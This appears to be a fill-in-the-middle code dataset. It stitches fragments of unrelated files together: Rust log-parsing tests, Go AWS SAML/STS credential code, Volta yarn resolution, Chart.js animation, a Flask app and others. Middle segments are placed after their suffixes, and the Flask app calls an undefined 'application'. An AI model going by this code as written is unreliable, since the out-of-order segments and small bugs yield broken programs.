let b_end = b_start + b_count;
packet.data[a_end] = b_count as c_char;
packet.fill_data(b_start..b_end, 'B' as _);
let c_start = b_end + 1;
let c_count = 5;
let c_end = c_start + c_count;
packet.fill_data(c_start..c_end, 'C' as _);
let data_size = c_start + c_count;
let buffer = &packet.as_bytes()[..METADATA_SIZE + data_size + 1]; // null-terminated
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + data_size,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: vec![String::from("AAAAAAAAAAA"), String::from("BBBBB")],
contents: String::from("CCCCC"),
}
);
}
#[test]
fn max_tags_with_message() {
let mut packet = test_packet();
let tags_start = 1;
let tag_len = 2;
let tag_size = tag_len + 1; // the length-prefix byte
for tag_num in 0..MAX_TAGS {
let start = tags_start + (tag_size * tag_num);
let end = start + tag_len;
packet.data[start - 1] = tag_len as c_char;
let ascii = 'A' as c_char + tag_num as c_char;
packet.fill_data(start..end, ascii);
}
let msg_start = tags_start + (tag_size * MAX_TAGS);
let msg_len = 5;
let msg_end = msg_start + msg_len;
let msg_ascii = 'A' as c_char + MAX_TAGS as c_char;
packet.fill_data(msg_start..msg_end, msg_ascii);
let min_buffer = &packet.as_bytes()[..METADATA_SIZE + msg_end + 1]; // null-terminated
let full_buffer = &packet.as_bytes()[..];
let min_parsed = Message::from_logger(min_buffer).unwrap();
let full_parsed = Message::from_logger(full_buffer).unwrap();
let expected_message = Message {
size: METADATA_SIZE + msg_end,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
contents: String::from_utf8(vec![msg_ascii as u8; msg_len]).unwrap(),
tags: (0..MAX_TAGS as _)
.map(|tag_num| {
String::from_utf8(vec![('A' as c_char + tag_num) as u8; tag_len]).unwrap()
})
.collect(),
};
assert_eq!(min_parsed, expected_message);
assert_eq!(full_parsed, expected_message);
}
#[test]
fn max_tags() {
let mut packet = test_packet();
let tags_start = 1;
let tag_len = 2;
let tag_size = tag_len + 1; // the length-prefix byte
for tag_num in 0..MAX_TAGS {
let start = tags_start + (tag_size * tag_num);
let end = start + tag_len;
packet.data[start - 1] = tag_len as c_char;
let ascii = 'A' as c_char + tag_num as c_char;
packet.fill_data(start..end, ascii);
}
let msg_start = tags_start + (tag_size * MAX_TAGS);
let buffer_missing_terminator = &packet.as_bytes()[..METADATA_SIZE + msg_start];
assert_eq!(
Message::from_logger(buffer_missing_terminator),
Err(StreamError::OutOfBounds),
"can't parse an empty message without a nul terminator"
);
let buffer = &packet.as_bytes()[..METADATA_SIZE + msg_start + 1]; // null-terminated
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + msg_start,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: (0..MAX_TAGS as _)
.map(|tag_num| String::from_utf8(vec![('A' as c_char + tag_num) as u8; 2])
.unwrap())
.collect(),
contents: String::new(),
}
);
}
#[test]
fn no_tags_with_message() {
let mut packet = test_packet();
packet.data[0] = 0;
packet.data[1] = 'A' as _;
packet.data[2] = 'A' as _; // measured size ends here
packet.data[3] = 0;
let buffer = &packet.as_bytes()[..METADATA_SIZE + 4]; // 0 tag size + 2 byte message + null
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + 3,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: vec![],
contents: String::from("AA"),
}
);
}
}
| fill_data |
awssts.go | // Copyright 2021 Masaya Suzuki
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package awssts
import (
"context"
"encoding/base64"
"encoding/xml"
"fmt"
"strconv"
"strings"
"time"
"github.com/aws/aws-sdk-go-v2/aws"
"github.com/aws/aws-sdk-go-v2/service/sts"
"github.com/crewjam/saml"
"gopkg.in/ini.v1"
)
// RoleProviderPair is a pair in SAML Role Attribute.
//
// See
// https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_saml_assertions.html#saml_role-attribute.
type RoleProviderPair struct {
RoleARN string
PrincipalARN string
}
type SAMLAttributes struct {
Roles []RoleProviderPair
SessionDuration time.Duration
}
type AWSAuthRequest struct {
PrincipalARN string
RoleARN string
SAMLAssertion string
SessionDuration time.Duration
}
type AWSAuthResponse struct {
AWSAccessKeyID string
AWSSecretAccessKey string
AWSSessionToken string
}
func ParseBase64EncodedSAMLResponse(s string) (*SAMLAttributes, error) {
bs, err := base64.StdEncoding.DecodeString(s)
if err != nil {
return nil, fmt.Errorf("cannot decode the base64 encoded SAML assertion: %v", err)
}
return ParseSAMLResponse(bs)
}
func ParseSAMLResponse(bs []byte) (*SAMLAttributes, error) {
var response saml.Response
if err := xml.Unmarshal(bs, &response); err != nil {
return nil, fmt.Errorf("cannot parse the SAML response: %v", err)
}
var ret SAMLAttributes
for _, stmt := range response.Assertion.AttributeStatements {
for _, attr := range stmt.Attributes {
var err error
switch attr.Name {
case "https://aws.amazon.com/SAML/Attributes/SessionDuration":
ret.SessionDuration, err = parseSessionDurationValue(attr.Values)
if err != nil {
return nil, err
}
case "https://aws.amazon.com/SAML/Attributes/Role":
ret.Roles, err = parseRoleValue(attr.Values)
if err != nil {
return nil, err
}
}
}
}
return &ret, nil
}
func parseSessionDurationValue(values []saml.AttributeValue) (time.Duration, error) {
if len(values) != 1 |
sec, err := strconv.ParseInt(values[0].Value, 10, 64)
if err != nil {
return time.Duration(0), fmt.Errorf("SessionDuration %s cannot be parsed as an integer: %v", values[0].Value, err)
}
if sec < 0 {
return time.Duration(0), fmt.Errorf("SessionDuration %d must be non-negative", sec)
}
return time.Duration(sec) * time.Second, nil
}
func parseRoleValue(values []saml.AttributeValue) ([]RoleProviderPair, error) {
var ret []RoleProviderPair
for _, value := range values {
ss := strings.Split(value.Value, ",")
if len(ss) != 2 {
return nil, fmt.Errorf("A role-provider pair should have exactly two comma-separated elements")
}
ret = append(ret, RoleProviderPair{
RoleARN: ss[0],
PrincipalARN: ss[1],
})
}
return ret, nil
}
func AWSSTSExchange(ctx context.Context, req *AWSAuthRequest) (*AWSAuthResponse, error) {
input := &sts.AssumeRoleWithSAMLInput{
PrincipalArn: aws.String(req.PrincipalARN),
RoleArn: aws.String(req.RoleARN),
SAMLAssertion: aws.String(req.SAMLAssertion),
}
if req.SessionDuration != time.Duration(0) {
input.DurationSeconds = aws.Int32(int32(req.SessionDuration.Seconds()))
}
output, err := sts.New(sts.Options{Region: "aws-global"}).AssumeRoleWithSAML(ctx, input)
if err != nil {
return nil, fmt.Errorf("AWS STS returns an error: %v", err)
}
return &AWSAuthResponse{
AWSAccessKeyID: *output.Credentials.AccessKeyId,
AWSSecretAccessKey: *output.Credentials.SecretAccessKey,
AWSSessionToken: *output.Credentials.SessionToken,
}, nil
}
func UpdateCredentialFile(fp, profileName string, resp *AWSAuthResponse) error {
config, err := ini.Load(fp)
if err != nil {
return fmt.Errorf("cannot parse the existing config: %v", err)
}
section := config.Section(profileName)
section.DeleteKey("aws_access_key_id")
section.DeleteKey("aws_secret_access_key")
section.DeleteKey("aws_session_token")
section.NewKey("aws_access_key_id", resp.AWSAccessKeyID)
section.NewKey("aws_secret_access_key", resp.AWSSecretAccessKey)
section.NewKey("aws_session_token", resp.AWSSessionToken)
if err := config.SaveTo(fp); err != nil {
return fmt.Errorf("cannot save the credential: %v", err)
}
return nil
}
| {
return time.Duration(0), fmt.Errorf("SessionDuration should have only one value")
} |
getAccessPoints.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package efs
import (
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Provides information about multiple Elastic File System (EFS) Access Points.
//
// ## Example Usage
//
// ```go
// package main
//
// import (
// "github.com/pulumi/pulumi-aws/sdk/v2/go/aws/efs"
// "github.com/pulumi/pulumi/sdk/v2/go/pulumi"
// )
//
// func main() {
// pulumi.Run(func(ctx *pulumi.Context) error {
// _, err := efs.GetAccessPoints(ctx, &efs.GetAccessPointsArgs{
// FileSystemId: "fs-12345678",
// }, nil)
// if err != nil {
// return err
// }
// return nil
// })
// }
// ```
func GetAccessPoints(ctx *pulumi.Context, args *GetAccessPointsArgs, opts ...pulumi.InvokeOption) (*GetAccessPointsResult, error) {
var rv GetAccessPointsResult
err := ctx.Invoke("aws:efs/getAccessPoints:getAccessPoints", args, &rv, opts...)
if err != nil {
return nil, err | }
return &rv, nil
}
// A collection of arguments for invoking getAccessPoints.
type GetAccessPointsArgs struct {
// EFS File System identifier.
FileSystemId string `pulumi:"fileSystemId"`
}
// A collection of values returned by getAccessPoints.
type GetAccessPointsResult struct {
// Set of Amazon Resource Names (ARNs).
Arns []string `pulumi:"arns"`
FileSystemId string `pulumi:"fileSystemId"`
// The provider-assigned unique ID for this managed resource.
Id string `pulumi:"id"`
// Set of identifiers.
Ids []string `pulumi:"ids"`
} | |
resolve.rs | //! Provides resolution of Yarn requirements into specific versions
use std::env;
use super::super::registry::{
fetch_npm_registry, public_registry_index, PackageDetails, PackageIndex,
};
use super::super::registry_fetch_error;
use super::metadata::{RawYarnIndex, YarnIndex};
use crate::error::{Context, ErrorKind, Fallible};
use crate::hook::{RegistryFormat, YarnHooks};
use crate::session::Session;
use crate::style::progress_spinner;
use crate::version::{parse_version, VersionSpec, VersionTag};
use attohttpc::Response;
use log::debug;
use semver::{Version, VersionReq};
pub fn resolve(matching: VersionSpec, session: &mut Session) -> Fallible<Version> {
let hooks = session.hooks()?.yarn();
match matching {
VersionSpec::Semver(requirement) => resolve_semver(requirement, hooks),
VersionSpec::Exact(version) => Ok(version),
VersionSpec::None => resolve_tag(VersionTag::Latest, hooks),
VersionSpec::Tag(tag) => resolve_tag(tag, hooks),
}
}
fn resolve_tag(tag: VersionTag, hooks: Option<&YarnHooks>) -> Fallible<Version> {
// This triage is complicated because we need to maintain the legacy behavior of hooks
// First, if the tag is 'latest' and we have a 'latest' hook, we use the old behavior
// Next, if the tag is 'latest' and we _do not_ have a 'latest' hook, we use the new behavior
// Next, if the tag is _not_ 'latest' and we have an 'index' hook, we show an error since
// the previous behavior did not support generic tags
// Finally, we don't have any relevant hooks, so we can use the new behavior
match (tag, hooks) {
(
VersionTag::Latest,
Some(&YarnHooks {
latest: Some(ref hook),
..
}),
) => {
debug!("Using yarn.latest hook to determine latest-version URL");
// does yarn3 use latest-version? no
resolve_latest_legacy(hook.resolve("latest-version")?)
}
(VersionTag::Latest, _) => resolve_custom_tag(VersionTag::Latest.to_string()),
(tag, Some(&YarnHooks { index: Some(_), .. })) => Err(ErrorKind::YarnVersionNotFound {
matching: tag.to_string(),
}
.into()),
(tag, _) => resolve_custom_tag(tag.to_string()),
}
}
fn resolve_semver(matching: VersionReq, hooks: Option<&YarnHooks>) -> Fallible<Version> {
// For semver, the triage is less complicated: The previous behavior _always_ used
// the 'index' hook, so we can check for that to decide which behavior to use.
//
// If the user specifies a format for the registry, we use that. Otherwise Github format
// is the default legacy behavior.
if let Some(&YarnHooks {
index: Some(ref hook),
..
}) = hooks
{
debug!("Using yarn.index hook to determine yarn index URL");
match hook.format {
RegistryFormat::Github => resolve_semver_legacy(matching, hook.resolve("releases")?),
RegistryFormat::Npm => resolve_semver_npm(matching, hook.resolve("")?),
}
} else {
resolve_semver_from_registry(matching)
}
}
fn fetch_yarn_index(package: &str) -> Fallible<(String, PackageIndex)> {
let url = public_registry_index(package);
fetch_npm_registry(url, "Yarn")
}
fn resolve_custom_tag(tag: String) -> Fallible<Version> {
if env::var_os("VOLTA_FEATURE_YARN_3").is_some() {
// first try yarn2+, which uses "@yarnpkg/cli-dist" instead of "yarn"
let (url, mut index) = fetch_yarn_index("@yarnpkg/cli-dist")?;
if let Some(version) = index.tags.remove(&tag) {
debug!("Found yarn@{} matching tag '{}' from {}", version, tag, url);
if version.major == 2 {
return Err(ErrorKind::Yarn2NotSupported.into());
}
return Ok(version);
}
debug!(
"Did not find yarn matching tag '{}' from @yarnpkg/cli-dist",
tag
);
}
let (url, mut index) = fetch_yarn_index("yarn")?;
match index.tags.remove(&tag) {
Some(version) => {
debug!("Found yarn@{} matching tag '{}' from {}", version, tag, url);
Ok(version)
}
None => Err(ErrorKind::YarnVersionNotFound { matching: tag }.into()),
}
}
fn resolve_latest_legacy(url: String) -> Fallible<Version> {
let response_text = attohttpc::get(&url)
.send()
.and_then(Response::error_for_status)
.and_then(Response::text)
.with_context(|| ErrorKind::YarnLatestFetchError {
from_url: url.clone(),
})?;
debug!("Found yarn latest version ({}) from {}", response_text, url);
parse_version(response_text)
}
fn resolve_semver_from_registry(matching: VersionReq) -> Fallible<Version> {
if env::var_os("VOLTA_FEATURE_YARN_3").is_some() {
// first try yarn2+, which uses "@yarnpkg/cli-dist" instead of "yarn"
let (url, index) = fetch_yarn_index("@yarnpkg/cli-dist")?;
let matching_entries: Vec<PackageDetails> = index
.entries
.into_iter()
.filter(|PackageDetails { version, .. }| matching.matches(version))
.collect();
if !matching_entries.is_empty() {
let details_opt = matching_entries
.iter()
.find(|PackageDetails { version, .. }| version.major >= 3);
match details_opt {
Some(details) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
details.version, matching, url
);
return Ok(details.version.clone());
}
None => {
return Err(ErrorKind::Yarn2NotSupported.into());
}
}
}
debug!(
"Did not find yarn matching requirement '{}' from {}",
matching, url
);
}
let (url, index) = fetch_yarn_index("yarn")?;
let details_opt = index
.entries
.into_iter()
.find(|PackageDetails { version, .. }| matching.matches(version));
match details_opt {
Some(details) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
details.version, matching, url
);
Ok(details.version)
}
// at this point Yarn is not found in either registry
None => Err(ErrorKind::YarnVersionNotFound {
matching: matching.to_string(),
}
.into()),
}
}
fn resolve_semver_legacy(matching: VersionReq, url: String) -> Fallible<Version> {
let spinner = progress_spinner(format!("Fetching registry: {}", url));
let releases: RawYarnIndex = attohttpc::get(&url)
.send()
.and_then(Response::error_for_status)
.and_then(Response::json)
.with_context(registry_fetch_error("Yarn", &url))?;
let index = YarnIndex::from(releases);
let releases = index.entries;
spinner.finish_and_clear();
let version_opt = releases.into_iter().rev().find(|v| matching.matches(v));
match version_opt {
Some(version) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
version, matching, url
);
Ok(version)
}
None => Err(ErrorKind::YarnVersionNotFound {
matching: matching.to_string(),
}
.into()),
}
}
fn resolve_semver_npm(matching: VersionReq, url: String) -> Fallible<Version> {
let (url, index) = fetch_npm_registry(url, "Yarn")?;
let details_opt = index
.entries
.into_iter()
.find(|PackageDetails { version, .. }| matching.matches(version));
match details_opt {
Some(details) => {
debug!(
"Found yarn@{} matching requirement '{}' from {}",
details.version, matching, url
);
Ok(details.version)
}
None => Err(ErrorKind::YarnVersionNotFound {
matching: matching.to_string(),
}
.into()),
}
} | ||
env.go | package shell
import (
"fmt"
"github.com/aliyun/saml2alibabacloud/pkg/alibabacloudconfig"
"github.com/aliyun/saml2alibabacloud/pkg/cfg"
"github.com/aliyun/saml2alibabacloud/pkg/flags"
)
// BuildEnvVars build an array of env vars in the format required for exec
func BuildEnvVars(alibabacloudCreds *alibabacloudconfig.AliCloudCredentials, account *cfg.IDPAccount, execFlags *flags.LoginExecFlags) []string {
environmentVars := []string{
fmt.Sprintf("ALICLOUD_ASSUME_ROLE_SESSION_NAME=%s", alibabacloudCreds.AliCloudSessionToken),
fmt.Sprintf("ALICLOUD_SECURITY_TOKEN=%s", alibabacloudCreds.AliCloudSecurityToken),
fmt.Sprintf("ALICLOUD_ACCESS_KEY=%s", alibabacloudCreds.AliCloudAccessKey),
fmt.Sprintf("ALICLOUD_SECRET_KEY=%s", alibabacloudCreds.AliCloudSecretKey),
}
if execFlags.ExecProfile == "" {
// Only set profile env vars if we haven't already assumed a role via a profile | } | environmentVars = append(environmentVars, fmt.Sprintf("ALICLOUD_PROFILE=%s", account.Profile))
}
return environmentVars |
core.animation.js | /* global window: false */
'use strict';
var defaults = require('./core.defaults');
var Element = require('./core.element');
var helpers = require('../helpers/index');
defaults._set('global', {
animation: {
duration: 0,
easing: 'easeOutQuart',
onProgress: helpers.noop,
onComplete: helpers.noop
}
});
module.exports = function(Chart) {
Chart.Animation = Element.extend({
chart: null, // the animation associated chart instance
currentStep: 0, // the current animation step
numSteps: 60, // default number of steps
easing: '', // the easing to use for this animation
render: null, // render function used by the animation service
onAnimationProgress: null, // user specified callback to fire on each step of the animation
onAnimationComplete: null, // user specified callback to fire when the animation finishes
});
Chart.animationService = {
frameDuration: 17,
animations: [],
dropFrames: 0,
request: null,
/**
* @param {Chart} chart - The chart to animate.
* @param {Chart.Animation} animation - The animation that we will animate.
* @param {Number} duration - The animation duration in ms.
* @param {Boolean} lazy - if true, the chart is not marked as animating to enable more responsive interactions
*/
addAnimation: function(chart, animation, duration, lazy) {
var animations = this.animations;
var i, ilen;
animation.chart = chart;
if (!lazy) {
chart.animating = true;
}
for (i = 0, ilen = animations.length; i < ilen; ++i) {
if (animations[i].chart === chart) {
animations[i] = animation;
return;
}
}
animations.push(animation);
// If there are no animations queued, manually kickstart a digest, for lack of a better word
if (animations.length === 1) {
this.requestAnimationFrame();
}
},
cancelAnimation: function(chart) {
var index = helpers.findIndex(this.animations, function(animation) {
return animation.chart === chart;
});
if (index !== -1) {
this.animations.splice(index, 1);
chart.animating = false;
}
},
requestAnimationFrame: function() {
var me = this;
if (me.request === null) {
// Skip animation frame requests until the active one is executed.
// This can happen when processing mouse events, e.g. 'mousemove'
// and 'mouseout' events will trigger multiple renders.
me.request = helpers.requestAnimFrame.call(window, function() {
me.request = null;
me.startDigest();
});
}
},
/**
* @private
*/
startDigest: function() {
var me = this;
var startTime = Date.now();
var framesToDrop = 0;
if (me.dropFrames > 1) {
framesToDrop = Math.floor(me.dropFrames);
me.dropFrames = me.dropFrames % 1;
}
me.advance(1 + framesToDrop);
var endTime = Date.now();
me.dropFrames += (endTime - startTime) / me.frameDuration;
// Do we have more stuff to animate?
if (me.animations.length > 0) {
me.requestAnimationFrame();
}
},
/**
* @private
*/
advance: function(count) {
var animations = this.animations;
var animation, chart;
var i = 0;
while (i < animations.length) {
animation = animations[i]; | chart = animation.chart;
animation.currentStep = (animation.currentStep || 0) + count;
animation.currentStep = Math.min(animation.currentStep, animation.numSteps);
helpers.callback(animation.render, [chart, animation], chart);
helpers.callback(animation.onAnimationProgress, [animation], chart);
if (animation.currentStep >= animation.numSteps) {
helpers.callback(animation.onAnimationComplete, [animation], chart);
chart.animating = false;
animations.splice(i, 1);
} else {
++i;
}
}
}
};
/**
* Provided for backward compatibility, use Chart.Animation instead
* @prop Chart.Animation#animationObject
* @deprecated since version 2.6.0
* @todo remove at version 3
*/
Object.defineProperty(Chart.Animation.prototype, 'animationObject', {
get: function() {
return this;
}
});
/**
* Provided for backward compatibility, use Chart.Animation#chart instead
* @prop Chart.Animation#chartInstance
* @deprecated since version 2.6.0
* @todo remove at version 3
*/
Object.defineProperty(Chart.Animation.prototype, 'chartInstance', {
get: function() {
return this.chart;
},
set: function(value) {
this.chart = value;
}
});
}; | |
util.rs | #![cfg(target_pointer_width = "64")]
/// Utilities for integer vectors.
pub mod vec_io;
use crate::broadword;
/// Returns the number of bits to represent `x` at least.
///
/// # Example
///
/// ```
/// use sucds::util::needed_bits;
///
/// assert_eq!(needed_bits(0), 1);
/// assert_eq!(needed_bits(1), 1);
/// assert_eq!(needed_bits(2), 2);
/// assert_eq!(needed_bits(255), 8);
/// assert_eq!(needed_bits(256), 9);
/// ```
pub fn needed_bits(x: usize) -> usize | {
broadword::msb(x).map_or(1, |n| n + 1)
} |
|
app.py | import flask
from flask import Flask,jsonify,request
import json
from data_input import data_in
import numpy as np
import pickle
def load_models():
|
app = Flask(__name__)
@app.route('/predict',methods=['GET'])
def predict():
request_json = request.get_json()
x = request_json['input']
x_in = np.array(x).reshape(1,-1)
model = load_models()
prediction = model.predict(x_in)[0]
response = json.dumps({'response': prediction})
return response,200
if __name__ == '__main__':
application.run(debug=True) | file_name = './models/model_file.p'
with open(file_name,'rb') as pickled:
data = pickle.load(pickled)
model = data['model']
return model |
StatusBarDrawItemEventHandler.py | class StatusBarDrawItemEventHandler(MulticastDelegate,ICloneable,ISerializable):
"""
Represents the method that will handle the System.Windows.Forms.StatusBar.DrawItem event of a System.Windows.Forms.StatusBar.
StatusBarDrawItemEventHandler(object: object,method: IntPtr)
"""
def Instance(self):
""" This function has been arbitrarily put into the stubs"""
return StatusBarDrawItemEventHandler()
def BeginInvoke(self,sender,sbdevent,callback,object):
""" BeginInvoke(self: StatusBarDrawItemEventHandler,sender: object,sbdevent: StatusBarDrawItemEventArgs,callback: AsyncCallback,object: object) -> IAsyncResult """
pass
def CombineImpl(self,*args):
"""
CombineImpl(self: MulticastDelegate,follow: Delegate) -> Delegate
Combines this System.Delegate with the specified System.Delegate to form a new delegate.
follow: The delegate to combine with this delegate.
Returns: A delegate that is the new root of the System.MulticastDelegate invocation list.
"""
pass
def DynamicInvokeImpl(self,*args):
|
def EndInvoke(self,result):
""" EndInvoke(self: StatusBarDrawItemEventHandler,result: IAsyncResult) """
pass
def GetMethodImpl(self,*args):
"""
GetMethodImpl(self: MulticastDelegate) -> MethodInfo
Returns a static method represented by the current System.MulticastDelegate.
Returns: A static method represented by the current System.MulticastDelegate.
"""
pass
def Invoke(self,sender,sbdevent):
""" Invoke(self: StatusBarDrawItemEventHandler,sender: object,sbdevent: StatusBarDrawItemEventArgs) """
pass
def RemoveImpl(self,*args):
"""
RemoveImpl(self: MulticastDelegate,value: Delegate) -> Delegate
Removes an element from the invocation list of this System.MulticastDelegate that is equal to the specified delegate.
value: The delegate to search for in the invocation list.
Returns: If value is found in the invocation list for this instance,then a new System.Delegate without value in its invocation list; otherwise,this instance with its original invocation list.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,object,method):
""" __new__(cls: type,object: object,method: IntPtr) """
pass
def __reduce_ex__(self,*args):
pass
| """
DynamicInvokeImpl(self: Delegate,args: Array[object]) -> object
Dynamically invokes (late-bound) the method represented by the current delegate.
args: An array of objects that are the arguments to pass to the method represented by the current delegate.-or- null,if the method represented by the current delegate does not require arguments.
Returns: The object returned by the method represented by the delegate.
"""
pass |
setup.rs | //! Utilities used during the initial setup
use crate::Pool;
use actix_web::middleware::Logger;
use blake2::{Blake2b, Digest};
use diesel::{
r2d2::{self, ConnectionManager},
sqlite::SqliteConnection,
};
use std::{env, path::PathBuf};
#[cfg(not(feature = "dev"))]
use dirs;
#[cfg(feature = "dev")]
use dotenv;
#[cfg(feature = "dev")]
use std::str::FromStr;
#[cfg(not(feature = "dev"))]
use std::{
fs,
io::{self, BufRead},
process,
};
#[cfg(not(feature = "dev"))]
use toml;
/// Returns a path to the directory storing application data
#[cfg(not(feature = "dev"))]
pub fn get_data_dir() -> PathBuf |
/// Returns a path to the directory storing application config
#[cfg(not(feature = "dev"))]
pub fn get_config_dir() -> PathBuf {
let base_dir = dirs::config_dir().expect("Unable to determine the config directory");
base_dir.join(env!("CARGO_PKG_NAME"))
}
/// Returns a path to the configuration file
#[cfg(not(feature = "dev"))]
fn get_config_path() -> PathBuf {
get_config_dir().join("config.toml")
}
/// Returns a path to the bearer token hash
#[cfg(not(feature = "dev"))]
pub fn get_password_path() -> PathBuf {
get_config_dir().join("passwd")
}
/// Returns the BLAKE2b digest of the input string
pub fn hash<T: AsRef<[u8]>>(input: T) -> Vec<u8> {
let mut hasher = Blake2b::new();
hasher.input(input);
hasher.result().to_vec()
}
/// Returns an environment variable and panic if it isn't found
#[cfg(feature = "dev")]
#[macro_export]
macro_rules! get_env {
($k:literal) => {
std::env::var($k).expect(&format!("Can't find {} environment variable", $k));
};
}
/// Returns a parsed environment variable and panic if it isn't found or is not parsable
#[cfg(feature = "dev")]
macro_rules! parse_env {
($k:literal) => {
get_env!($k).parse().expect(&format!("Invalid {}", $k))
};
}
/// Application configuration
#[derive(Serialize, Deserialize, Clone)]
#[cfg_attr(not(feature = "dev"), serde(default))]
pub struct Config {
/// Port to listen on
pub port: u16,
/// SQLite database connection url
pub database_url: String,
/// SQLite database connection pool size
pub pool_size: u32,
/// Directory where to store static files
pub files_dir: PathBuf,
/// Maximum allowed file size
pub max_filesize: usize,
/// SSL Certificate private key location
pub cert_privkey: String,
/// SSL Certificate chain location
pub cert_chain: String,
/// Use SSL or not
pub use_ssl: bool,
}
#[cfg(not(feature = "dev"))]
impl Default for Config {
fn default() -> Self {
let port = 8080;
let database_url = {
let path = get_data_dir().join("database.db");
path.to_str()
.expect("Can't convert database path to string")
.to_owned()
};
let pool_size = std::cmp::max(1, num_cpus::get() as u32 / 2);
let files_dir = get_data_dir().join("files");
let max_filesize = 10_000_000;
let cert_privkey = "cert.pem".to_string();
let cert_chain = "chain.pem".to_string();
let use_ssl = false;
Config {
port,
database_url,
pool_size,
files_dir,
max_filesize,
cert_privkey,
cert_chain,
use_ssl,
}
}
}
impl Config {
/// Deserialize the config file
#[cfg(not(feature = "dev"))]
pub fn read_file() -> Result<Self, &'static str> {
let path = get_config_path();
let contents = if let Ok(contents) = fs::read_to_string(&path) {
contents
} else {
return Err("Can't read config file.");
};
let result = toml::from_str(&contents);
if result.is_err() {
return Err("Invalid config file.");
}
let mut result: Config = result.unwrap();
if result.files_dir.is_absolute() {
if fs::create_dir_all(&result.files_dir).is_err() {
return Err("Can't create files_dir.");
}
result.files_dir = match result.files_dir.canonicalize() {
Ok(path) => path,
Err(_) => return Err("Invalid files_dir."),
}
} else {
let files_dir = get_data_dir().join(&result.files_dir);
if fs::create_dir_all(&files_dir).is_err() {
return Err("Can't create files_dir.");
}
result.files_dir = match files_dir.canonicalize() {
Ok(path) => path,
Err(_) => return Err("Invalid files_dir."),
}
}
Ok(result)
}
/// Serialize the config file
#[cfg(not(feature = "dev"))]
pub fn write_file(&self) -> Result<(), &'static str> {
let path = get_config_path();
let contents = toml::to_string(&self).expect("Can't serialize config.");
match fs::write(&path, &contents) {
Ok(_) => Ok(()),
Err(_) => Err("Can't write config file."),
}
}
/// Creates a config from environment variables
#[cfg(feature = "dev")]
pub fn debug() -> Self {
dotenv::dotenv().ok();
let port = parse_env!("PORT");
let database_url = get_env!("DATABASE_URL");
let pool_size = parse_env!("POOL_SIZE");
let files_dir = {
let files_dir = get_env!("FILES_DIR");
let path = PathBuf::from_str(&files_dir).expect("Can't convert files dir to path");
if path.is_absolute() {
path.canonicalize().expect("Invalid FILES_DIR")
} else {
let cargo_manifest_dir = env!("CARGO_MANIFEST_DIR");
let mut cargo_manifest_dir = PathBuf::from_str(cargo_manifest_dir)
.expect("Can't convert cargo manifest dir to path");
cargo_manifest_dir.push(&path);
cargo_manifest_dir
.canonicalize()
.expect("Invalid FILES_DIR")
}
};
let max_filesize = parse_env!("MAX_FILESIZE");
let cert_privkey = parse_env!("CERTIFICATE");
let cert_chain = parse_env!("CERT_CHAIN");
let use_ssl = parse_env!("USE_SSL");
Config {
port,
database_url,
pool_size,
files_dir,
max_filesize,
cert_privkey,
cert_chain,
use_ssl,
}
}
}
/// Creates a SQLite database connection pool
pub fn create_pool(url: &str, size: u32) -> Pool {
let manager = ConnectionManager::<SqliteConnection>::new(url);
r2d2::Pool::builder()
.max_size(size)
.build(manager)
.expect("Can't create pool")
}
/// Initializes the logger
pub fn init_logger() {
if cfg!(feature = "dev") && env::var_os("RUST_LOG").is_none() {
env::set_var("RUST_LOG", "actix_web=debug");
} else if !cfg!(feature = "dev") {
env::set_var("RUST_LOG", "actix_web=info");
}
env_logger::init();
}
/// Returns the logger middleware
pub fn logger_middleware() -> Logger {
#[cfg(feature = "dev")]
{
dotenv::dotenv().ok();
if let Ok(format) = env::var("LOG_FORMAT") {
Logger::new(&format)
} else {
Logger::default()
}
}
#[cfg(not(feature = "dev"))]
{
Logger::default()
}
}
/// Performs the initial setup
#[cfg(not(feature = "dev"))]
pub fn init() -> Config {
fs::create_dir_all(get_config_dir()).unwrap_or_else(|e| {
eprintln!("Can't create config directory: {}.", e);
process::exit(1);
});
let password_path = get_password_path();
if !password_path.exists() {
let stdin = io::stdin();
let mut stdin = stdin.lock();
let mut password = String::new();
loop {
println!("Enter the password to use: ");
stdin.read_line(&mut password).unwrap_or_else(|e| {
eprintln!("Can't read password: {}", e);
process::exit(1);
});
password = password.replace("\r", "");
password = password.replace("\n", "");
if !password.is_empty() {
break;
}
println!("Are you sure you want to leave an empty password? This will disable authentication: [y/N]: ");
let mut answer = String::new();
stdin.read_line(&mut answer).unwrap_or_else(|e| {
eprintln!("Can't read answer: {}", e);
process::exit(1);
});
if answer.trim() == "y" {
break;
}
}
let password_hash = hash(&password);
fs::write(&password_path, password_hash.as_slice()).unwrap_or_else(|e| {
